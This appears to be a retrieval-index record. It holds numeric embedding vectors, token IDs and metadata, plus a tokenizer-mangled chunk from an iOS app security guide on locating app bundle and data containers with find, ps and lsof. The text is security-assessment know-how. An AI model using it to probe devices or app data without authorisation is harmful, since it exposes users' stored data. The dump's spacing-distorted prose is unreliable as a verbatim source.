-0.10531844943761826, 0.29631391167640686, -0.9752035140991211, -0.19118033349514008, 0.17879034578800201, 0.5324130654335022, 0.2181708961725235, 0.7242207527160645, -0.09998725354671478, -0.7332931756973267, 0.2344740480184555, -0.2787286937236786, -0.43673044443130493, -1.026498556137085, -0.2770463228225708, -0.558157205581665, 0.045397188514471054, -0.36138486862182617, 0.5967991948127747, 0.3819544315338135, 0.17598001658916473, 0.5169960856437683, -0.29955852031707764, -0.0908212661743164, -0.8711055517196655, -0.16012123227119446, -0.03794335946440697, 0.2352147400379181, -0.2207980901002884, 0.6528586149215698, -0.13737799227237701, 0.07466418296098709, -0.02437165006995201, 0.4977480173110962, 0.223227396607399, -0.6346746683120728, -0.589788019657135, 0.1569545567035675, 0.15803538262844086, -0.2108890563249588, -0.1974436342716217, 0.12738467752933502, -0.06134296953678131, -0.417750746011734, -0.08762726932764053, -0.29797717928886414, -0.6637170910835266, -0.8752166628837585, 0.1038561761379242, -0.3899269998073578, 0.6335583329200745, -0.2658357322216034, -0.3698344826698303, 0.1428147703409195, 0.3221331536769867, 0.1916242390871048, -0.7374988198280334, 0.03241857513785362, -0.06101977452635765, 0.33964329957962036, 0.23668155074119568, -0.24363213777542114, -0.2637806534767151, -0.3833247125148773, 0.02284691482782364, 0.9013233184814453, 0.2017444670200348, -0.24135145545005798, -0.1796244978904724, 0.07454930990934372, 0.5633957982063293, -0.25770580768585205, -0.4447275996208191, -0.4485674500465393, -0.3313765227794647, 0.14764708280563354, -0.5343722701072693, 0.4641059339046478, -0.6433157920837402, 0.7203354835510254, -0.5284908413887024, -0.7645264267921448, -0.004974323324859142, 0.10014444589614868, -0.18740682303905487, 0.27998924255371094, 0.40592533349990845, -0.7523577213287354, -0.0924365296959877, -0.2455054670572281, 0.950081467628479, 0.45203155279159546, -0.48499226570129395, -1.242222785949707, 0.2655203342437744, -0.6443637609481812, -0.9593486785888672, 0.5144684910774231, 0.04068313166499138, -0.3396422863006592, -0.13849282264709473, -0.23407621681690216, 0.6277023553848267, -0.12893466651439667, -0.04808676242828369, 1.2300612926483154, -0.07765891402959824, -0.1475619226694107, -0.7792466878890991, 0.29409724473953247, 0.6553257703781128, -0.4246421456336975, 0.5642683506011963, -0.1404709368944168, -0.05803178995847702, -0.1923757791519165, -0.20198142528533936, 0.02449425682425499, -0.5689867734909058, -0.17292532324790955, 0.3962079584598541, -0.444832444190979, 0.40722277760505676, 0.2644229829311371, -0.42424577474594116, 0.4783037304878235, 0.24316957592964172, -0.18932941555976868, -0.05812197923660278, 0.5793135762214661, 0.1565438210964203, -0.035483043640851974, -0.23959900438785553, 0.13730084896087646, -0.22836625576019287, 0.12566784024238586, 0.8054941296577454, 0.23824633657932281, -0.7239866852760315, 1.2786906957626343, 0.7612467408180237, -0.4365014135837555, -0.05560804903507233, -0.04659542813897133, -0.06823433190584183, 0.358262836933136, -0.38656890392303467, -0.1362178921699524, 0.49450376629829407, 0.22848662734031677, -0.1350981891155243, 0.5888827443122864, -0.14111652970314026, 0.12967076897621155, -0.06197812408208847, 0.28555673360824585, 0.38065582513809204, 0.27988699078559875, 0.21377480030059814, -1.0054270029067993, -0.601180374622345, -0.42289742827415466, 0.12906000018119812, 0.03989971801638603, -0.3506900668144226, 1.5838645696640015, -0.24815557897090912, 0.27792343497276306, -0.539543867111206, -0.1408204883337021, 0.3292275667190552, -0.1368165761232376, 0.151650533080101, 0.7322300672531128, -0.07562467455863953, -0.5285162329673767, -0.5584794878959656, 0.4326769709587097, 0.10863002389669418, 0.22396907210350037, -0.26457148790359497, 0.06700936704874039, -0.12359023839235306, 0.19354531168937683, 0.2864711284637451, -0.5962318181991577, -0.8804833889007568, -0.6393142342567444, 0.24660740792751312, 0.34191015362739563, -0.6025899648666382, -0.3656802177429199, -0.02546272799372673, 0.0001453480654163286, -0.4614179730415344, -0.025895852595567703, 0.4999208450317383, -0.2534291446208954, 0.2169424444437027, -0.8460080623626709, 0.5434489846229553, -0.5299111604690552, -0.8629456758499146, 0.07146831601858139, -0.1156616285443306, -0.6136969327926636, -0.4458337426185608, -0.16893240809440613, 0.09360306710004807, -0.4298284649848938, 0.848843514919281, -0.6725504398345947, -0.13113480806350708, -0.3474203646183014, -0.5031349062919617, 0.39077502489089966, 0.4516080617904663, -0.23212222754955292, 0.012089893221855164, 0.1398286521434784, 0.21653304994106293, 0.0398080013692379, -0.18673968315124512, 0.03301474452018738, -0.3373209834098816, -0.07595983892679214, 0.1450270414352417, 0.07986529171466827, -0.23284374177455902, 0.0105959577485919, 0.026687944307923317, -0.7204740047454834, -0.31822097301483154, -0.40014293789863586, 0.4818451702594757, 0.19567227363586426, -0.2716609239578247, 0.4524775445461273, 0.37593021988868713, 0.5369466543197632, 0.7108922004699707, -0.7375500202178955, 0.5728991031646729, 0.5427371263504028, 0.22374698519706726, 0.13750213384628296, 0.6445437073707581, 0.17117175459861755, -0.4123254716396332, 0.11783916503190994, 0.15582586824893951, -0.3417581021785736, 0.3967471420764923, -0.4364264905452728, 0.20168082416057587, -0.7354504466056824, -0.004191073123365641, 0.4106341600418091, 0.10330093652009964, 0.3772663176059723, -0.1199040561914444, 0.27224522829055786, 0.3715410828590393, -0.885853111743927, -0.22757084667682648, -0.6860241293907166, -0.29701659083366394, -0.18287236988544464, -0.2632485330104828, -0.5786457657814026, -0.5146855711936951, 0.016469156369566917, 0.011497758328914642, -0.18421585857868195, -0.300715833902359, 0.4801386296749115, 0.11224783211946487, -0.3372577726840973, 0.3774316906929016, -0.4839813709259033, -0.4784921407699585, -0.08111918717622757, 0.0847974568605423, -0.8608449101448059, -0.977375864982605, 0.8066847920417786, 0.8342680335044861, 0.3011441230773926, -0.5663942098617554, -0.7148445844650269, 0.2804988622665405, 0.36849454045295715, 0.4024117588996887, 0.43441033363342285, -0.0002666026121005416, -0.8277082443237305, 0.22631582617759705, -0.6354374885559082, 0.27179092168807983, -0.21207654476165771, -0.09428243339061737, 0.5739496946334839, -0.05693855136632919, -0.2989898920059204, 0.3271421492099762, -0.19427719712257385, 0.0969567596912384, 0.37299293279647827, 0.3847188651561737, 0.6549813747406006, -0.27994823455810547, 0.08173306286334991, -0.10117872059345245, -0.3099537491798401, 0.4652431309223175, 0.06835240870714188, -0.255818247795105, 0.21663883328437805, 0.3257112503051758, -0.6228747963905334, -0.3028462827205658, 0.87227463722229, 0.3772076964378357, -0.26072224974632263, -0.028289491310715675, -0.25519701838493347, -0.3158181309700012, 0.12357371300458908, -0.8673717379570007, 0.053583644330501556, -0.13023003935813904, -0.11814935505390167, -0.1047927737236023, -0.052170686423778534, 0.6734511852264404, -1.0507380962371826, 0.5006254315376282, -0.031920209527015686, -0.1815972626209259, 0.2483808845281601, -0.36643317341804504, -0.16635514795780182, 0.8586441874504089, 0.7870253324508667, 0.2133585810661316, 0.26863494515419006, 0.5433192253112793, -0.30197861790657043, -0.14805740118026733, 0.1773051768541336, -0.10172167420387268, -0.9738073945045471, 0.3326948583126068, 0.24064947664737701, -0.7272931337356567, -1.2204188108444214, -0.0004811037506442517, 0.2816229462623596, -0.3197323977947235, 0.28216782212257385, -0.618756115436554, -0.09071613848209381, -0.35596728324890137, 0.4019886255264282, -0.0014283977216109633, 0.28281545639038086, 0.40075773000717163, -0.255184143781662, -0.6339539885520935, 0.666896641254425, -0.168150395154953, 0.44931742548942566, 0.4351962208747864, 0.5520675182342529, 0.39580148458480835, 1.0453777313232422, -0.30455899238586426, -0.39746448397636414, 0.0651901587843895, -0.38584795594215393, 0.06566279381513596, -0.5592941641807556, 0.09956610947847366, -0.23467469215393066, 0.9641179442405701, 0.14739364385604858, -0.6230741143226624, -0.40696457028388977, -0.13768762350082397, -0.4078657031059265, -0.49779462814331055, -0.15391004085540771, 0.34200069308280945, -0.4289321303367615, 0.03280250355601311, 0.0030380922835320234, -0.15593354403972626, 0.30430278182029724, -0.26256999373435974, -0.6059420704841614, -0.4568744897842407, -0.00011210571392439306, 0.0795804113149643, 0.84969562292099, -0.7613651752471924, -0.0962640643119812, 0.5155052542686462, -0.5849962830543518, -0.4546796977519989, 0.2583368718624115, -0.3566766679286957, -0.3006894886493683, 0.5478792786598206, 0.03554266318678856, 0.8559702634811401, 0.6991222500801086, -0.151207834482193, -0.08842813968658447, 0.13532981276512146, 0.5616084933280945, -0.7492475509643555, 0.9532086253166199, 0.4302806556224823, -0.2627396881580353, 0.3231646716594696, -0.35115036368370056, 0.5029074549674988, -0.4426557719707489, -0.6123487949371338, -0.6763014793395996, -0.6021319627761841, -0.7594364285469055, -0.5152081847190857, 0.08942077308893204, 0.4849390685558319, 0.07632222026586533, 0.12673357129096985, -0.899436354637146, 0.4324025511741638, -0.6138184070587158, 0.7997229695320129, -0.4073770344257355, -0.3834041655063629, 0.5393844842910767, 0.36238545179367065, 0.9256826639175415, -1.0614027976989746, 4.452176570892334, 0.5584996342658997, 0.009020639583468437, 0.3112330138683319, -0.015460808761417866, 0.4629664421081543, 1.0383824110031128, -0.9592399001121521, 0.3949659764766693, -0.4653967618942261, 0.47402119636535645, -0.4205423891544342, 0.7178652882575989, 0.48388218879699707, 0.18931737542152405, 0.374491423368454, -0.35378214716911316, -0.27563390135765076, 0.3232012391090393, -0.7049751281738281, -0.9723259806632996, 0.028074942529201508, -0.39657095074653625, 1.352878451347351, 0.12358149886131287, 0.35127681493759155, -0.02290762960910797, -0.512992262840271, 0.07803995162248611, -0.21553194522857666, -0.2086906135082245, -0.5117509961128235, 0.452915221452713, -0.343229204416275, -0.3941890299320221, 0.2545804977416992, 0.4468769431114197, -1.135459065437317, -0.6789889931678772, 1.0451974868774414, -0.0395079143345356, -0.21057848632335663, 0.230690598487854, -0.3902871608734131, 0.23127087950706482, 1.1240854263305664, -0.2847151458263397, 0.23593899607658386, 1.0261353254318237, -0.39714938402175903, 0.5284649133682251, -0.21901854872703552, 0.5117877721786499, 0.11895803362131119, -0.440498024225235, -0.04308860003948212, -0.23548899590969086, -0.33487263321876526, 0.26362404227256775, 0.058959413319826126, 0.025841152295470238, -0.405950665473938, 0.1587933450937271, 0.10325323790311813, -0.9584963321685791, 0.750105082988739, -0.08656477183103561, 1.1448330879211426, 0.04567468538880348, -0.6337137818336487, -0.16236348450183868, -0.442930668592453, -0.3481980562210083, -0.07527655363082886, 0.7421382069587708, -0.4576927125453949, 0.1738126575946808, 0.5458376407623291, 0.20388825237751007, -0.710970401763916, -0.3905593454837799, -0.4350006580352783, -0.8410847783088684, 0.42889025807380676, 0.699593722820282, 0.584222137928009, 0.2477329969406128, -0.9086176156997681, 0.32678869366645813, 0.11499179899692535, 0.1641949564218521, 0.3487500250339508, -0.058464184403419495, -0.018169401213526726, 0.24519985914230347 ]
[ 1996, 2653, 15173, 2008, 3397, 4219, 2005, 2216, 3563, 4155, 1010, 1998, 1037, 12398, 7692, 1999, 2553, 1037, 2653, 3475, 1005, 1056, 3569, 1012, 2045, 2024, 3674, 3971, 2000, 9375, 1996, 21318, 1999, 2019, 16380, 4646, 1024, 2466, 6277, 1010, 9152, 2497, 2030, 8418, 2497, 6764, 1012, 18558, 1012, 20228, 2923, 10760, 2592, 3200, 2862, 2030, 18558, 1012, 20228, 2923, 2003, 1996, 2364, 3120, 1997, 2592, 2005, 2019, 16380, 10439, 1012, 2009, 3774, 1997, 1037, 14336, 5371, 4820, 3145, 1011, 3643, 7689, 7851, 6827, 9563, 2592, 2055, 1996, 10439, 1012, 2941, 1010, 2035, 24378, 4654, 8586, 23056, 2015, 1006, 10439, 14305, 1010, 7705, 2015, 1998, 18726, 1007, 2024, 3517, 2000, 2031, 2019, 18558, 1012, 20228, 2923, 5371, 1012, 2017, 2064, 2424, 2035, 2825, 6309, 1999, 1996, 6207, 9722, 12653, 1012, 1996, 5371, 2453, 2022, 4289, 3064, 1999, 20950, 2030, 12441, 1006, 17531, 9863, 1007, 1012, 2017, 2064, 10463, 2009, 2000, 20950, 4289, 2007, 2028, 3722, 3094, 1024, 2006, 6097, 2891, 2007, 20228, 21823, 2140, 1010, 2029, 2003, 1037, 6994, 2008, 3310, 3128, 2135, 2007, 6097, 2891, 2184, 1012, 1016, 1998, 2682, 4617, 1006, 2053, 2880, 3784, 12653, 2003, 2747, 2800, 1007, 1024, 1002, 20228, 21823, 2140, 1011, 10463, 20950, 2487, 18558, 1012, 20228, 20483, 2078, 11603, 1024, 1002, 26794, 16500, 5622, 2497, 24759, 2923, 1011, 21183, 12146, 1002, 20228, 2923, 21823, 2140, 1011, 1045, 18558, 1012, 20228, 2923, 1011, 1051, 18558, 1035, 20950, 1012, 20228, 2923, 5886, 2063, 1005, 1055, 1037, 2512, 1011, 15095, 3512, 2862, 1997, 2070, 18558, 1998, 1996, 7978, 3145, 22104, 2008, 2017, 2064, 4089, 3945, 2005, 1999, 1996, 18558, 1012, 20228, 2923, 5371, 2011, 2074, 29508, 1996, 5371, 2030, 2011, 2478, 24665, 13699, 1011, 1045, 1026, 3145, 18351, 1028, 18558, 1012, 20228, 2923, 1024, 10439, 6656, 2015, 3800, 7817, 1024, 8192, 6155, 23235, 3258, 7874, 20389, 24471, 2140, 11683, 1024, 12935, 27265, 2571, 3126, 24228, 10374, 10288, 6442, 2098, 1013, 10964, 7661, 6254, 4127, 1024, 21183, 10288, 6442, 2098, 13874, 3207, 20464, 25879, 8496, 1013, 21183, 5714, 6442, 2098, 13874, 3207, 20464, 25879, 8496, 29098, 3665, 3036, 1006, 2012, 2015, 1007, 9563, 1024, 23971, 9397, 6494, 3619, 25378, 8586, 25137, 10814, 11022, 6523, 2000, 1996, 3855, 9159, 2000, 4553, 2062, 2055, 2129, 2000, 3231, 2169, 1997, 2122, 2685, 1012, 2951, 10425, 2239, 16380, 1010, 2291, 5097, 2064, 2022, 2179, 1999, 1996, 1013, 5097, 14176, 2096, 5310, 1011, 5361, 18726, 2024, 2800, 2104, 1013, 2797, 1013, 13075, 1013, 16143, 1013, 1012, 2174, 1010, 4531, 1996, 2157, 19622, 2074, 2011, 6583, 5737, 16961, 1996, 5371, 2291, 2003, 2025, 1037, 20610, 4708, 2004, 2296, 10439, 4152, 1037, 6721, 11899, 1011, 2978, 1057, 21272, 1006, 5415, 4310, 8909, 4765, 18095, 1007, 4137, 2005, 2049, 14176, 3415, 1012, 1999, 2344, 2000, 4089, 6855, 1996, 8272, 14176, 2592, 2005, 5310, 1011, 5361, 18726, 2017, 2064, 2224, 22224, 1005, 1055, 3094, 4372, 2615, 2097, 2036, 2265, 2017, 2035, 1996, 14176, 2592, 1997, 1996, 10439, 1024, 27593, 3022, 2361, 1012, 1045, 3995, 4017, 1011, 9170, 2006, 1006, 18059, 1024, 2340, 1012, 1015, 1012, 1016, 1007, 1031, 18833, 1033, 1001, 4372, 29207, 4168, 4130, 1011, 1011, 1011 ]
hack_tricks
43.txt
3
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - bundlepath / var / containers / bundle / application / 3adaf47d - a734 - 49fa - b274 - fbca66589e67 / igoat - swift. appcachesdirectory / var / mobile / containers / data / application / 8c8e7eb0 - bc9b - 435b - 8ef8 - 8f5560eb0693 / library / cachesdocumentdirectory / var / mobile / containers / data / application / 8c8e7eb0 - bc9b - 435b - 8ef8 - 8f5560eb0693 / documentslibrarydirectory / var / mobile / containers / data / application / 8c8e7eb0 - bc9b - 435b - 8ef8 - 8f5560eb0693 / libraryyou could also search for the app name inside / private / var / containers : find / private / var / containers - name " progname * " or using ps and lsof : ps - ef | grep - i < app - name > lsof - p < pid > | grep - i " / containers " | head - n 1as you can see, apps have two main locations : the bundle directory ( / var / containers / bundle / application / 3adaf47d - a734 - 49fa - b274 - fbca66589e67 / ). the data directory ( / var / mobile / containers / data / application / 8c8e7eb0 - bc9b - 435b - 8ef8 - 8f5560eb0693 / ). these folders contain information that must be examined closely during application security assessments ( for example when analyzing the stored data for sensitive data ). bundle directory : appname. appthis is the application bundle as seen
[ 0.5844582915306091, -0.6359277367591858, 0.22366195917129517, 0.5423760414123535, 0.0026834942400455475, -0.10798311233520508, -0.4205576479434967, 0.3721212148666382, 0.33971571922302246, 0.16176488995552063, -0.0601159892976284, 0.15747766196727753, 0.7596524357795715, -0.2183668166399002, -0.4162978231906891, -0.25996485352516174, -0.21632328629493713, 0.17992639541625977, -1.0251413583755493, -0.14760783314704895, 0.12446087598800659, 0.6495336890220642, -0.5368974804878235, -0.42107507586479187, -0.17002393305301666, 0.5742727518081665, 0.665520191192627, 0.1309622973203659, 0.502550482749939, 0.33814316987991333, 0.3727347254753113, -0.1696503460407257, 0.04905795305967331, -0.3843931555747986, 0.27356940507888794, 0.03065343014895916, 1.2083359956741333, 0.056249137967824936, 0.5153844356536865, -0.9295673370361328, -0.02109607681632042, -0.5805501341819763, 0.43103060126304626, -0.597862184047699, -0.554020345211029, -0.45124468207359314, 0.054940465837717056, -0.2566238045692444, 0.584754467010498, -0.3465690314769745, 0.4738541543483734, 0.11282731592655182, 0.01841067150235176, 0.08261673897504807, 0.451576828956604, 0.14296580851078033, -0.44694533944129944, 0.21245716512203217, 0.11434084922075272, 0.018198953941464424, -0.34013769030570984, 0.6726664304733276, 0.04788488894701004, -1.0006028413772583, 0.03925352171063423, 0.5715495944023132, 0.4887585937976837, -0.2569409906864166, -0.12053084373474121, -0.03810065984725952, -0.367431640625, 0.9639030694961548, -0.5535335540771484, -0.8792272806167603, -0.16313280165195465, -1.0091564655303955, 0.12650015950202942, -0.11977992206811905, 0.4710436761379242, 0.5119290351867676, 0.008153572678565979, 0.4218830466270447, 0.38168272376060486, -0.0828714668750763, -0.702082097530365, -0.13673366606235504, 0.36046600341796875, 0.6423661708831787, -0.41805344820022583, -0.1122511476278305, 0.7574549317359924, 0.12487716972827911, -0.03956521674990654, -0.5596258044242859, 0.3894110918045044, 0.8107299208641052, -0.17953266203403473, 0.28876161575317383, 0.40329036116600037, -0.41837283968925476, 1.293927550315857, 0.4266706109046936, -0.06137334927916527, -0.11204611510038376, -0.5288735032081604, 0.44877463579177856, 0.40967363119125366, -0.6248429417610168, 0.0037827608175575733, -0.21162152290344238, 0.5593916177749634, 0.22962278127670288, -0.011559071019291878, -0.6170514822006226, -0.08714867383241653, 0.16160783171653748, 0.17083266377449036, -0.1927703320980072, -0.18703824281692505, 0.8988783359527588, -0.12465120851993561, -0.31245455145835876, 0.026929613202810287, -0.6259803771972656, 0.2290988713502884, 0.3665040135383606, -0.5091673731803894, 1.1730871200561523, -0.13211940228939056, -0.5740655660629272, -0.060058917850255966, 0.1859438717365265, -0.20900440216064453, 0.5730537176132202, 0.026387788355350494, 0.181479811668396, 0.005433141719549894, -0.015626240521669388, 0.7667400240898132, -1.0188218355178833, -0.03252548351883888, -0.250875324010849, 0.4623959958553314, 1.4632757902145386, 0.3012627959251404, -0.5295836329460144, -0.6756559014320374, -0.2101047933101654, -0.5628646612167358, 0.39876607060432434, -0.11853697896003723, 0.10679758340120316, 0.6102529764175415, -1.1020480394363403, -0.5607126951217651, 0.8176261186599731, 0.3889223039150238, 0.18924210965633392, 0.032491445541381836, 0.21814385056495667, -0.22450584173202515, 0.45005032420158386, 0.3369814455509186, 0.5632821917533875, -0.10430974513292313, 0.547808825969696, -0.5650709271430969, -0.3068799078464508, -0.09197008609771729, 0.5136947631835938, -0.1839333027601242, 0.44500532746315, -0.24671359360218048, 0.38141700625419617, 1.1301487684249878, 0.3683367669582367, -0.349069744348526, -0.10109604895114899, -0.017214501276612282, 0.07814642041921616, -0.3976672887802124, -0.010420839302241802, 0.23468230664730072, 0.5639964938163757, -0.5059890747070312, 0.41271114349365234, -0.7304861545562744, -0.37886756658554077, -0.5090069770812988, -0.6046817898750305, -0.6177510619163513, 0.6060426235198975, -0.3152342140674591, 0.11827977001667023, 0.8459664583206177, 0.12062777578830719, -1.0542988777160645, -0.5931522250175476, 0.24988657236099243, -1.9338270425796509, -0.7018508911132812, 0.042827922850847244, -0.1316036880016327, 0.1367940604686737, -0.7084667682647705, -0.12367939949035645, 0.07847951352596283, 0.766333281993866, 0.1437380313873291, 0.3862052261829376, 0.32153868675231934, 0.22572451829910278, -0.7625191807746887, -0.604425311088562, 0.36019423604011536, -0.6649298667907715, -0.37399256229400635, 0.5305678248405457, 0.027381829917430878, 0.16861562430858612, -0.32217076420783997, 0.6910878419876099, 0.6483250856399536, 0.24500572681427002, -0.20149759948253632, 0.01697614975273609, 0.1402376890182495, 0.2148653119802475, -1.23798668384552, -0.2589278817176819, -0.08617838472127914, 0.2856890857219696, 0.39751100540161133, 1.0947420597076416, 0.0077246795408427715, 0.18967223167419434, 0.6026287078857422, -0.19492550194263458, -0.09927018731832504, -0.1322476863861084, 0.02728300169110298, 0.6309162378311157, 0.4280472993850708, 0.5912155508995056, 0.5531741380691528, 0.33832141757011414, -0.0057686008512973785, -0.09440753608942032, -0.11348962783813477, 0.7948489785194397, -0.600891649723053, 1.0423073768615723, 0.42143526673316956, -0.30354973673820496, -0.7275903820991516, -0.7025171518325806, 0.027016310021281242, 0.9314135909080505, -0.9018294811248779, -0.7008521556854248, 0.03702237457036972, -0.17285358905792236, -0.3755728304386139, -0.4982762634754181, 0.47778549790382385, 0.7336485981941223, -0.13164818286895752, 0.2954552173614502, -0.23482947051525116, -0.7740561366081238, -0.9585928916931152, -0.8086835741996765, -1.0606094598770142, -0.5320388078689575, -1.1399564743041992, -0.02555934526026249, 0.8013629913330078, -0.379036009311676, 0.7042723298072815, -0.340966135263443, -0.7700691223144531, 0.7303768992424011, 0.6853865385055542, 0.63698810338974, 0.12920251488685608, 0.40401747822761536, -1.0601956844329834, 0.4587308466434479, 0.07847116142511368, 0.540436863899231, -0.15545643866062164, -0.023283032700419426, -0.13578322529792786, 0.04257991164922714, 0.228371262550354, -0.31495290994644165, 0.29673129320144653, 0.07496471703052521, -0.40858185291290283, -0.11727646738290787, 0.6254563331604004, -0.2371557354927063, 0.27505168318748474, 0.17998060584068298, -0.19235269725322723, 1.0259613990783691, -0.14409032464027405, -0.26713135838508606, 0.6615355610847473, 0.05411536991596222, -0.4569300711154938, 0.7139455080032349, -0.39996761083602905, 0.6271224617958069, -0.44435355067253113, 0.458040714263916, 0.5781335234642029, 0.5012529492378235, -0.2919170558452606, -0.3586726486682892, 0.092704638838768, -0.20924623310565948, -0.7090855836868286, -0.31899896264076233, -0.09032855927944183, 0.04600471630692482, 0.0792020708322525, -1.1693581342697144, 0.24904821813106537, -0.4259284436702728, 0.24622584879398346, -0.2743676006793976, 0.15900316834449768, 0.6710216999053955, -0.6199643611907959, 0.3362264037132263, -0.1706603765487671, -0.48301762342453003, 0.2540820837020874, 0.2142716497182846, -0.13640306890010834, -0.4584411382675171, 0.09086273610591888, 0.2361517995595932, 0.029051639139652252, 0.6893143653869629, 0.3865737020969391, -0.26708242297172546, -0.29194176197052, -0.32891055941581726, -0.5475062131881714, -0.21905584633350372, 0.6400085687637329, 0.4715472161769867, 0.33056625723838806, 0.05667268857359886, -0.4718852639198303, -0.770913302898407, 0.46733784675598145, -0.3670940697193146, -0.24405835568904877, 0.44122642278671265, 0.33941999077796936, -0.20897290110588074, -0.3396553695201874, -0.4052959680557251, -0.35834774374961853, -0.047601550817489624, 0.6242355108261108, -0.37328824400901794, 0.4262674152851105, -0.43402862548828125, -0.1967453807592392, 0.5194989442825317, -0.3934112787246704, -1.312888503074646, 0.5942246913909912, 0.11959381401538849, 0.6805053353309631, -0.1581411510705948, -0.40543967485427856, 0.438618928194046, 0.033965982496738434, 0.4139004647731781, 0.19763384759426117, -0.06050514802336693, -0.1718975454568863, -0.6556248664855957, 0.21115140616893768, -0.2840792238712311, 0.02260529436171055, 0.22080451250076294, 0.0806255117058754, -0.24626126885414124, -0.12181271612644196, -0.4246048033237457, 0.22054971754550934, 0.7174770832061768, 0.9801332354545593, 0.29788047075271606, 0.4979316294193268, 0.634762704372406, 0.11380551755428314, 0.6413252949714661, -0.2570705711841583, 0.21814760565757751, -0.006136944517493248, 0.4726233184337616, -0.2595282793045044, -0.1656297743320465, -0.28703999519348145, -0.20568698644638062, -0.42451000213623047, -0.03600098937749863, -0.00030308589339256287, 0.21878136694431305, -0.9856203198432922, -0.27223941683769226, 0.16757316887378693, -0.2105269879102707, -0.15930232405662537, 0.284030944108963, -0.2369205504655838, 0.5222800970077515, 0.41576260328292847, -0.09973104298114777, -0.43968629837036133, -1.000717282295227, 0.2998695373535156, 0.5162758231163025, -0.2918991446495056, -0.00037723168497905135, -0.768787682056427, -0.29741936922073364, -0.3154689073562622, 0.7610923647880554, 0.2720847427845001, 0.4081062078475952, 0.37163233757019043, -1.0365283489227295, 0.0031302839051932096, 1.0226460695266724, -0.6746956706047058, -0.3624062240123749, -0.5209922790527344, 0.24718692898750305, 0.19071176648139954, 0.4826410114765167, 0.10270138829946518, -0.8345603346824646, 0.18622031807899475, -0.2957810163497925, 0.09916424751281738, -0.49062222242355347, 0.40496331453323364, 0.049130238592624664, 0.2020455002784729, 0.013384518213570118, 0.5555816292762756, -0.5139536261558533, 0.5050254464149475, 0.3404398560523987, 0.5218353867530823, -0.1102319061756134, -0.4268653690814972, 0.6613674759864807, -0.16447977721691132, -0.5678588151931763, 0.3635731041431427, 0.17831121385097504, -0.7302452921867371, 0.2796126902103424, -0.42543625831604004, -0.6221882104873657, 0.9406760931015015, -0.2863771915435791, 0.7954646944999695, 0.48536887764930725, 0.20464083552360535, -0.027481796219944954, -0.5676252841949463, 0.36730095744132996, -0.1057734414935112, 0.3468371331691742, -0.8539329171180725, -0.5025290250778198, -0.049918532371520996, -0.010878659784793854, -0.1049557700753212, 0.2279043048620224, 0.6213147044181824, -0.41168126463890076, -0.01868029125034809, -0.4600173532962799, -0.08695008605718613, -1.1100441217422485, -0.2569259703159332, -0.35308411717414856, 0.17399871349334717, 0.13289836049079895, 0.8918803334236145, -0.4325682520866394, -0.37490856647491455, 0.36853381991386414, 0.06745284795761108, 0.4605032801628113, -0.5469048619270325, 0.03833310678601265, 0.15464425086975098, 0.3948591947555542, -0.2575635313987732, 0.025979073718190193, -0.03678479045629501, -0.4166739881038666, 0.47388362884521484, 0.3444749712944031, 0.3950640857219696, -0.48912474513053894, -0.3828071057796478, 0.4186282455921173, 0.12420864403247833, -0.19143140316009521, -0.10708291828632355, 0.1104356199502945, -0.44638699293136597, 0.026587124913930893, -0.20273831486701965, -0.36854222416877747, -1.1020383834838867, -0.4163065254688263, 0.46800148487091064, -0.3976627588272095, -0.20874835550785065, -0.5063610076904297, -0.35417982935905457, -0.15740658342838287, 0.17854392528533936, 0.07907881587743759, -0.8037379384040833, -0.14446258544921875, -0.033565882593393326, 0.03751775622367859, 0.46553340554237366, -0.09538846462965012, -0.091219961643219, -0.37628108263015747, 0.008134995587170124, 1.1866588592529297, 0.1512303650379181, -0.10925436019897461, -0.009576123207807541, 0.5582903623580933, 0.08733781427145004, 0.29654964804649353, -0.4761967062950134, -0.39951372146606445, -0.8942237496376038, -0.48640045523643494, 0.5363211035728455, 1.1570184230804443, -0.3498304486274719, 0.10586636513471603, -0.42046990990638733, -0.25628572702407837, 0.4250374436378479, -0.005418094806373119, 0.034532107412815094, -0.16819703578948975, 0.6315605044364929, -0.41908028721809387, -0.09970699995756149, -0.2357376515865326, 0.9799085259437561, 0.3359414041042328, -0.3567650318145752, -0.28583744168281555, 0.3380213975906372, -0.414869099855423, -0.9379742741584778, 0.49317315220832825, -0.19513969123363495, -0.04745938628911972, -0.09762392193078995, -0.40239810943603516, 0.24598053097724915, -0.7451289296150208, -0.04182884097099304, 0.5325993895530701, 0.867547333240509, 0.016140133142471313, -0.626896858215332, 0.4033956527709961, 0.14778777956962585, -0.11329047381877899, 0.104169100522995, -0.2595613896846771, 0.0575929619371891, -0.3334544003009796, -0.6024410724639893, 0.16686205565929413, -0.3466324806213379, -0.4206679165363312, 0.5793164968490601, 0.0022818411234766245, 0.6095982789993286, 0.30434444546699524, -0.7360791563987732, -0.06691321730613708, 0.5513779520988464, -0.13548342883586884, -0.44992154836654663, 0.28328463435173035, 0.021470380946993828, -0.4205881357192993, -0.16607525944709778, 0.4670262932777405, -0.6644717454910278, -0.01587703451514244, 0.7866745591163635, 0.07403109967708588, -0.6878299117088318, 0.5206375122070312, 0.434668630361557, -0.5820196866989136, 0.091468445956707, -0.19311662018299103, -0.10295803844928741, -0.09761197865009308, -0.2485066056251526, -0.4533344507217407, 0.6115394234657288, -0.2629121243953705, 1.0021313428878784, 0.28435835242271423, 0.2761176526546478, -0.22121280431747437, -0.07793799042701721, 1.0354995727539062, 0.07826126366853714, 0.4813757836818695, 0.47475412487983704, -0.6384886503219604, -0.32471445202827454, -0.5385518670082092, 0.2571967840194702, -0.3732014000415802, -0.2952112853527069, 0.5781122446060181, -0.5428214073181152, -0.26021769642829895, 0.06327491253614426, 0.3908306360244751, 0.7978835701942444, -0.07019884139299393, 0.5084711313247681, 0.3766024708747864, -0.3047511875629425, -0.35253581404685974, -0.40251559019088745, 0.49003055691719055, -0.3634934723377228, 0.21927016973495483, -0.18052583932876587, -0.6113351583480835, -0.5975877046585083, -0.17156006395816803, -0.17382392287254333, -1.0576426982879639, -0.9570063948631287, -0.9403257369995117, -0.317018985748291, 0.05698515847325325, -0.3115973174571991, 0.3842281699180603, -0.028293361887335777, -0.3759825527667999, -0.2725285589694977, -0.4092150628566742, 0.5370152592658997, -0.264668345451355, 0.2433311641216278, -0.39574581384658813, 0.48208409547805786, -0.3217777907848358, -0.28658831119537354, -0.32836630940437317, 0.07531493157148361, -0.26088425517082214, -1.065099835395813, -0.4564341902732849, 0.3770710229873657, -0.9371998906135559, 0.8888731002807617, -0.35373392701148987, -0.2690025269985199, 